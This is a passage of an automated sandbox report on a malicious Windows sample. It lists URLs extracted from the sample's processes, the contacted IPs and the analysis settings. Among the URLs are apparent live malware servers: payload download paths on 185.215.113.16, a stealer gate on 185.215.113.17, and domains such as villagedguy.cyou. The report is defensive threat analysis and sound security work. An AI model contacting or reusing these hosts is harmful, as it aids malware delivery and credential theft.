https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1&	new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	stealc_default2.exe, 00000011.00000003.1992187439.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2178680224.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2368715722.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2405275859.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://home.sevjoi17sr.top/TCQEoezkVqyvrJjqBhZs12	Offnewhere.exe, 00000012.00000000.1986602049.000000000061B000.00000002.00000001.01000000.0000000A.sdmp	false		unknown
https://lv.queniujq.cn	new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://villagedguy.cyou/api(ws	new_v8.exe, 00000016.00000003.2853535555.0000000000BF3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2783040007.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2852199772.0000000000BED000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://villagedguy.cyou:443/api4	new_v8.exe, 00000016.00000003.2176713314.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2177592016.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/profiles/76561199724331900bf	new_v8.exe, 00000016.00000003.2159125127.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B51000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions	chrome.exe, 0000002B.00000002.2760490321.00002B3C004C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2763383332.00002B3C00734000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy	chrome.exe, 0000002B.00000002.2764280996.00002B3C00830000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2760324094.00002B3C0045C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.16/dobre/splwow64.exe	axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.17/2fb6c2cc8dce150a.php5	stealc_default2.exe, 00000011.00000002.2162755046.0000000000D36000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.17/2fb6c2cc8dce150a.php)	stealc_default2.exe, 00000011.00000002.2162755046.0000000000D36000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://anglebug.com/4722	chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://m.google.com/devicemanagement/data/api	chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://docs.google.com/presentation/u/0/create?usp=chrome_actions	chrome.exe, 0000002B.00000002.2760490321.00002B3C004C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2763383332.00002B3C00734000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://checkout.steampowered.com/	new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.17/2fb6c2cc8dce150a.phpEdge	stealc_default2.exe, 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png	new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.16/off/def.exe	new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2852199772.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2784699735.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2779671424.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.16/ows	axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=KkhJqW2NGKiM&l=engli	new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.17/2fb6c2cc8dce150a.php?	stealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://html4/loose.dtd	Offnewhere.exe, 00000012.00000000.1986602049.000000000061B000.00000002.00000001.01000000.0000000A.sdmp	false		unknown
http://185.215.113.17/f1ddeb6592c03206/msvcp140.dllwa	stealc_default2.exe, 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://anglebug.com/3502	chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anglebug.com/3623	chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771681065.00002B3C00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anglebug.com/3625	chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771681065.00002B3C00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anglebug.com/3624	chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771681065.00002B3C00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://help.steampowered.com/en/	new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anglebug.com/3862	chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstoreLDDiscover	chrome.exe, 0000002B.00000002.2771964516.00002B3C00CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2366929652.00002B3C00448000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2371146012.00002B3C00EC4000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://cdn.discordapp.com/	axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://anglebug.com/4836	chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://issuetracker.google.com/issues/166475273	chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=	new_v8.exe, 00000016.00000003.2159125127.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.ico	chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://185.215.113.17/2fb6c2cc8dce150a.phpY	stealc_default2.exe, 00000011.00000002.2162755046.0000000000D36000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=bOP7RorZq4_W&l=englis	new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://villagedguy.cyou/s	new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v	new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://x1.c.lencr.org/0	new_v8.exe, 00000016.00000003.2227702021.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2512478153.00000000058BD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	new_v8.exe, 00000016.00000003.2227702021.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2512478153.00000000058BD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anglebug.com/3970	chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.16/dobre/random.exe9	axplong.exe, 0000000D.00000002.3755340826.0000000001348000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/workshop/	new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.mozilla.org/products/firefoxgro.all	550b7cfe5f.exe, 0000002A.00000003.2515107023.0000000005ADE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://.jpg	Offnewhere.exe, 00000012.00000000.1986602049.000000000061B000.00000002.00000001.01000000.0000000A.sdmp	false		unknown
https://google-ohttp-relay-query.fastly-edge.com/2P	chrome.exe, 0000002B.00000003.2259650975.0000229800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://185.215.113.17/f1ddeb6592c03206/freebl3.dll;fx#	stealc_default2.exe, 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en	new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/shared/javascript/R	new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://anglebug.com/5901	chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anglebug.com/3965	chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://anglebug.com/7161	chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://anglebug.com/7162	chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.	stealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2234480460.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anglebug.com/5906	chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anglebug.com/2517	chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anglebug.com/4937	chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Ff_1prscqzeu&	new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://issuetracker.google.com/166809097	chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://villagedguy.cyou/6	new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.16/steam/random.exe5I	axplong.exe, 0000000D.00000002.3764499174.0000000006190000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://lens.google.com/v3/upload	chrome.exe, 0000002B.00000003.2265759074.00002298006E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703422989.0000229800744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703524503.000022980078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2269345057.00002298006EC000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://necklacedmny.store/	550b7cfe5f.exe, 0000002A.00000002.3474564441.0000000000F46000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.3443810612.0000000000F46000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2461071670.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.3443481489.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.3444015191.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000002.3474153244.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2398275478.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2461039118.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2345731366.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.3087852951.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2345680824.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2461647337.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2512885460.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://anglebug.com/3832	chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/complete/	chrome.exe, 0000002B.00000002.2773346174.00002B3C00E24000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.steampowered.com/	new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/mobile	new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta	stealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0	stealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://anglebug.com/6651	chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://185.215.113.16/Jo89Ku7d/index.phpdedCd	axplong.exe, 0000000D.00000002.3764499174.0000000006190000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	false
185.215.113.36	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
2.59.161.36	unknown	Russian Federation	44676	VMAGE-ASRU	false
20.101.57.9	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
172.67.154.113	unknown	United States	13335	CLOUDFLARENETUS	false
185.215.113.17	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
162.159.133.233	unknown	United States	13335	CLOUDFLARENETUS	false
188.114.97.3	unknown	European Union	13335	CLOUDFLARENETUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
104.102.49.254	unknown	United States	16625	AKAMAI-ASUS	false
184.28.90.27	unknown	United States	16625	AKAMAI-ASUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1546540
Start date and time:	2024-11-01 05:01:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 15m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	53
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@93/82@0/13
EGA Information:	Successful, ratio: 40%
HCA Information:	Successful, ratio: 57% Number of executed functions: 123 Number of non-executed functions: 179
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe, WmiPrvSE.exe
Execution Graph export aborted for target axplong.exe, PID 7468 because there are no executed function
Execution Graph export aborted for target axplong.exe, PID 7616 because there are no executed function
Execution Graph export aborted for target file.exe, PID 5740 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
